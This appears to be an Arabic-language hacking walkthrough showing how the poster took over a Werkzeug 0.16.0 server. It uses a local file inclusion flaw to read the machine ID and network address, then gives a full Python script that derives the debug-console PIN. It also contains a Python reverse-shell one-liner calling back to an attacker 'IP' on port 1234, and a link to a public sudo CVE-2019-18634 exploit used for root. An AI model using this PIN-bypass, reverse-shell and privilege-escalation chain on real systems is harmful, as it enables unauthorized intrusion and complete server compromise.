Werkzeug httpd login bypass via lfi and py + reverse shell + root

وجدت ملف بايثون اونلاين يقدر يعطيك باس الدخول بوجود شروط معرفة ال machine id + address
الاصدار الذي تم التطبيق عليه ونجح : Werkzeug httpd 0.16.0 (Python 2.7.15+)

لحسن الحظ وجدت ثغرة LFI نقدر نقرأ منها المتطلبات لتشغيل السكربت …
وكملت الموضوع للروت لما شفت اصدار sudo قديم موجود له ثغرة BOF

الشرح في الصور .

الدخول المباشر للكونسل يطلب البن :

ثغرة الوكل فايل

لتطبيق سكربت البايثون هذا هو الكود :

import hashlib
from itertools import chain
probably_public_bits = [
	'aas',# username
	'flask.app',# modname
	'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
	'/usr/local/lib/python2.7/dist-packages/flask/app.pyc' # getattr(mod, '__file__', None),
]

private_bits = [
	'345052364024',# str(uuid.getnode()),  /sys/class/net/ens33/address
	'258f132cd7e647caaf5510e3aca997c1'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
	if not bit:
		continue
	if isinstance(bit, str):
		bit = bit.encode('utf-8')
	h.update(bit)
h.update(b'cookiesalt')
#h.update(b'shittysalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
	h.update(b'pinsalt')
	num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
	for group_size in 5, 4, 3:
		if len(num) % group_size == 0:
			rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
						  for x in range(0, len(num), group_size))
			break
	else:
		rv = num

print(rv)

لابد من قراءة المشين اي دي والادريسس عن طريق ال lfi تابع الصورة :

وظهر لنا البن كود بعد تطبيق السكربت وتم تسجيل الدخول بنجاح !

بعد تسجيل الدخول محاول تطبيق الاوامر فشلت معاي لا ادري ما السبب لكني نجحت بالاتصال العكسي !

كود باثيون الاتصال المستعمل :

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

اصدار سودو قديم 1.8.21 معروف وجود ثغرة له ! CVE-2019–18634

رابط الثغرة :
https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c

عمل كومبايل

والنتيجة مبروك علينا الروت :slight_smile:

4.jpg

6.jpg

7.jpg

الفترة هذه Privilege Escalation كثرة

شكرا تويستر